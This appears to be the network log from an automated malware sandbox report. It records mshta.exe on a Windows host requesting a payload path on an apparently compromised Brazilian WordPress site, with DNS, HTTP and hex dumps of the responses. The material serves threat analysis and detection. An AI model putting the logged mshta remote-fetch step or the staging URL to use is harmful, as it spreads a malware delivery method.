                                        Aug 16, 2022 10:49:07.165354967 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.323434114 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323478937 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323509932 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323530912 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.323537111 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323559046 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.323563099 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.323568106 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323576927 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.323601007 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323621988 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323642969 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323664904 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323685884 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323705912 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323726892 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323748112 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323767900 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323787928 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323807955 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323827982 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323848009 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323869944 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323890924 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323911905 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.323931932 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324271917 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324322939 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324336052 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324348927 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324361086 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324373960 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324385881 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.324397087 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.326700926 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.329015017 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.393191099 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.393239975 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.393321037 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.393353939 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.544260979 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.544285059 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:07.544332027 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:07.544362068 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:12.393676996 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:12.394144058 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:12.549917936 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:12.551625013 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:24.568296909 CEST4917880192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:50:24.568624020 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:50:24.568780899 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:24.568972111 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:24.585550070 CEST8049177104.18.11.207192.168.2.22
                                        Aug 16, 2022 10:50:24.585696936 CEST4917780192.168.2.22104.18.11.207
                                        Aug 16, 2022 10:50:24.586775064 CEST8049178142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:50:24.586884975 CEST4917880192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:50:25.082787037 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:25.083414078 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:25.691160917 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:25.691265106 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:26.892400980 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:26.892647028 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:29.295192957 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:29.295655012 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:34.100301981 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:50:34.100538969 CEST4920480192.168.2.22187.45.240.69
                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 16, 2022 10:48:39.037828922 CEST5586853192.168.2.228.8.8.8
                                        Aug 16, 2022 10:48:39.060061932 CEST53558688.8.8.8192.168.2.22
                                        Aug 16, 2022 10:48:39.061472893 CEST5586853192.168.2.228.8.8.8
                                        Aug 16, 2022 10:48:39.199503899 CEST53558688.8.8.8192.168.2.22
                                        Aug 16, 2022 10:48:41.465980053 CEST5883653192.168.2.228.8.8.8
                                        Aug 16, 2022 10:48:41.486534119 CEST53588368.8.8.8192.168.2.22
                                        Aug 16, 2022 10:48:41.506683111 CEST5013453192.168.2.228.8.8.8
                                        Aug 16, 2022 10:48:41.523909092 CEST53501348.8.8.8192.168.2.22
                                        Aug 16, 2022 10:49:03.422740936 CEST5440853192.168.2.228.8.8.8
                                        Aug 16, 2022 10:49:03.449856043 CEST53544088.8.8.8192.168.2.22
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Aug 16, 2022 10:48:39.037828922 CEST192.168.2.228.8.8.80x269dStandard query (0)facextrade.com.brA (IP address)IN (0x0001)
                                        Aug 16, 2022 10:48:39.061472893 CEST192.168.2.228.8.8.80x269dStandard query (0)facextrade.com.brA (IP address)IN (0x0001)
                                        Aug 16, 2022 10:48:41.465980053 CEST192.168.2.228.8.8.80xc298Standard query (0)netdna.bootstrapcdn.comA (IP address)IN (0x0001)
                                        Aug 16, 2022 10:48:41.506683111 CEST192.168.2.228.8.8.80xd84aStandard query (0)translate.google.comA (IP address)IN (0x0001)
                                        Aug 16, 2022 10:49:03.422740936 CEST192.168.2.228.8.8.80x7d19Standard query (0)storage.ie6countdown.comA (IP address)IN (0x0001)
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Aug 16, 2022 10:48:39.060061932 CEST8.8.8.8192.168.2.220x269dNo error (0)facextrade.com.br187.45.240.69A (IP address)IN (0x0001)
                                        Aug 16, 2022 10:48:39.199503899 CEST8.8.8.8192.168.2.220x269dNo error (0)facextrade.com.br187.45.240.69A (IP address)IN (0x0001)
                                        Aug 16, 2022 10:48:41.486534119 CEST8.8.8.8192.168.2.220xc298No error (0)netdna.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)
                                        Aug 16, 2022 10:48:41.486534119 CEST8.8.8.8192.168.2.220xc298No error (0)netdna.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)
                                        Aug 16, 2022 10:48:41.523909092 CEST8.8.8.8192.168.2.220xd84aNo error (0)translate.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)
                                        Aug 16, 2022 10:48:41.523909092 CEST8.8.8.8192.168.2.220xd84aNo error (0)www3.l.google.com142.250.181.238A (IP address)IN (0x0001)
                                        Aug 16, 2022 10:49:01.557738066 CEST8.8.8.8192.168.2.220xf24bNo error (0)gstaticadssl.l.google.com172.217.16.195A (IP address)IN (0x0001)
                                        Aug 16, 2022 10:49:03.449856043 CEST8.8.8.8192.168.2.220x7d19Name error (3)storage.ie6countdown.comnonenoneA (IP address)IN (0x0001)
                                        • facextrade.com.br
                                          • translate.google.com
                                          • netdna.bootstrapcdn.com
                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249180142.250.181.238443C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.2249173187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:39.428519964 CEST0OUTGET /wp-includes/certificates/4.txt HTTP/1.1
                                        Accept: */*
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:41.186650991 CEST2INHTTP/1.1 404 Not Found
                                        Date: Tue, 16 Aug 2022 08:48:39 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 46 61 63 65 78 22 20 68 72 65 66 3d 22 68
                                        Data Ascii: 104f<!DOCTYPE html>...[if lt IE 7 ]><html class="ie ie6" lang="pt-BR"> <![endif]-->...[if IE 7 ]><html class="ie ie7" lang="pt-BR"> <![endif]-->...[if IE 8 ]><html class="ie ie8" lang="pt-BR"> <![endif]-->...[if IE 9 ]><html class="ie ie9" lang="pt-BR"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html lang="pt-BR"> ...<![endif]--><head><title>Error 404 Not Found | Facex</title><meta name="description" content=" &raquo; Pgina no encontrada | Facex Comrcio Exterior Ltda." /><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="profile" href="//gmpg.org/xfn/11" /><link rel="icon" href="http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico" type="image/x-icon" /><link rel="pingback" href="http://facextrade.com.br/xmlrpc.php" /><link rel="alternate" type="application/rss+xml" title="Facex" href="https://facextrade.com.br/feed/" /><link rel="alternate" type="application/atom+xml" title="Facex" href="h
                                        Aug 16, 2022 10:48:41.186708927 CEST3INData Raw: 74 74 70 73 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 66 65 65 64 2f 61 74 6f 6d 2f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65
                                        Data Ascii: ttps://facextrade.com.br/feed/atom/" /><link rel="stylesheet" type="text/css" media="all" href="http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/bootstrap.css" /><link rel="stylesheet" type="text/css" media="all" href="h
                                        Aug 16, 2022 10:48:41.186747074 CEST5INData Raw: 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 34 2e 39 2e 32 30 22 7d 7d 3b 0a 09 09 09 21 66 75 6e 63 74
                                        Data Ascii: cextrade.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.20"}};!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p
                                        Aug 16, 2022 10:48:41.186783075 CEST5INData Raw: 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65
                                        Data Ascii: pports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload
                                        Aug 16, 2022 10:48:41.190790892 CEST7INData Raw: 31 30 31 64 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61
                                        Data Ascii: 101d<style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em
                                        Aug 16, 2022 10:48:41.190831900 CEST8INData Raw: 74 2d 61 77 65 73 6f 6d 65 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d
                                        Data Ascii: t-awesome.css?ver=3.2.1' type='text/css' media='all' /><link rel='stylesheet' id='cherry-plugin-css' href='http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1' type='text/css' media='all' /><
                                        Aug 16, 2022 10:48:41.190871954 CEST9INData Raw: 73 73 3f 76 65 72 3d 31 2e 30 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 67 78 2d 6c 6f 67 6f 2d 73
                                        Data Ascii: ss?ver=1.0.0' type='text/css' media='all' /><link rel='stylesheet' id='lgx-logo-slider-animate-css' href='http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20' type='text/css' media='al
                                        Aug 16, 2022 10:48:41.190901041 CEST10INData Raw: 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 43 68 65 72 72 79 46 72 61 6d 65 77 6f 72 6b 2f 6a 73 2f 6a 71 75 65 72 79
                                        Data Ascii: ascript' src='http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2'></script>
                                        Aug 16, 2022 10:48:41.195338964 CEST11INData Raw: 31 30 37 66 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67
                                        Data Ascii: 107f<script type='text/javascript' src='http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3'></script><script type='text/javascript' src='http://facextrade.com.br/wp-content/plugins/cherry-plugin/li
                                        Aug 16, 2022 10:48:41.195403099 CEST13INData Raw: 2f 6a 73 2f 6c 6f 67 6f 2d 73 6c 69 64 65 72 2d 77 70 2d 70 75 62 6c 69 63 2e 6a 73 3f 76 65 72 3d 31 2e 30 2e 30 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73
                                        Data Ascii: /js/logo-slider-wp-public.js?ver=1.0.0'></script><script type='text/javascript' src='http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1'></script><script type='text/javascript' src='http://fac
                                        Aug 16, 2022 10:48:41.403086901 CEST14INData Raw: 4c 20 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 27 2c 0a 09 20 50 41 52 45 4e 54 5f 55 52 4c 20 3d 20 27 68 74 74 70 3a 2f
                                        Data Ascii: L ='http://facextrade.com.br/wp-content/themes/theme51253', PARENT_URL = 'http://facextrade.com.br/wp-content/themes/CherryFramework', CURRENT_THEME = 'theme51253'</script><style type='text/css'>body { background-image:url(http://facext


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        10192.168.2.2249185187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:43.710464001 CEST423OUTGET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:43.936249018 CEST425INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:43 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:35:52 GMT
                                        ETag: "a4f99b-7abe-58592ebd6de00"
                                        Accept-Ranges: bytes
                                        Content-Length: 31422
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2f 2a 20 23 53 68 6f 72 74 63 6f 64 65 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 2f 2a 20 52 65 63 65 6e 74 20 50 6f 73 74 73 20 53 68 6f 72 74 63 6f 64 65 73 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 20 7b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 30 20 2d 32 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 0a 20 20 2f 2a 20 49 6d 61 67 65 73 20 46 6f 72 6d 61 74 20 54 79 70 65 20 2a 2f 0a 20 20 2f 2a 20 51 75 6f 74 65 20 46 6f 72 6d 61 74 20 54 79 70 65 20 2a 2f 0a 20 20 2f 2a 20 4c 69 6e 6b 20 46 6f 72 6d 61 74 20 54 79 70 65 20 2a 2f 0a 20 20 2f 2a 20 41 75 64 69 6f 20 46 6f 72 6d 61 74 20 54 79 70 65 20 2a 2f 0a 20 20 2f 2a 20 56 69 64 65 6f 20 46 6f 72 6d 61 74 20 54 79 70 65 20 2a 2f 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 5f 6c 69 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 3b 0a 20 20 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 5f 6c 69 20 2e 66 65 61 74 75 72 65 64 2d 74 68 75 6d 62 6e 61 69 6c 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 32 30 70 78 20 30 20 30 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 5f 6c 69 20 68 35 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 5f 6c 69 20 2e 65 78 63 65 72 70 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 2e 35 65 6d 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 5f 6c 69 20 2e 6d 65 74 61 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2e 35 65 6d 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 38 38 38 3b 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 5f 6c 69 20 2e 70 6f 73 74 2d 64 61 74 65 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 5f 6c 69 20 2e 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 20 2e 66 6f 72 6d 61 74 2d 69 6d 61 67 65 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 32 30 70 78 20 32 30 70 78 20 30 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 20 2e 66 6f 72 6d 61 74 2d 61 75 64 69 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 65 6d 3b 0a 7d 0a 2e 72 65 63 65 6e 74 2d 70 6f 73 74 73 20
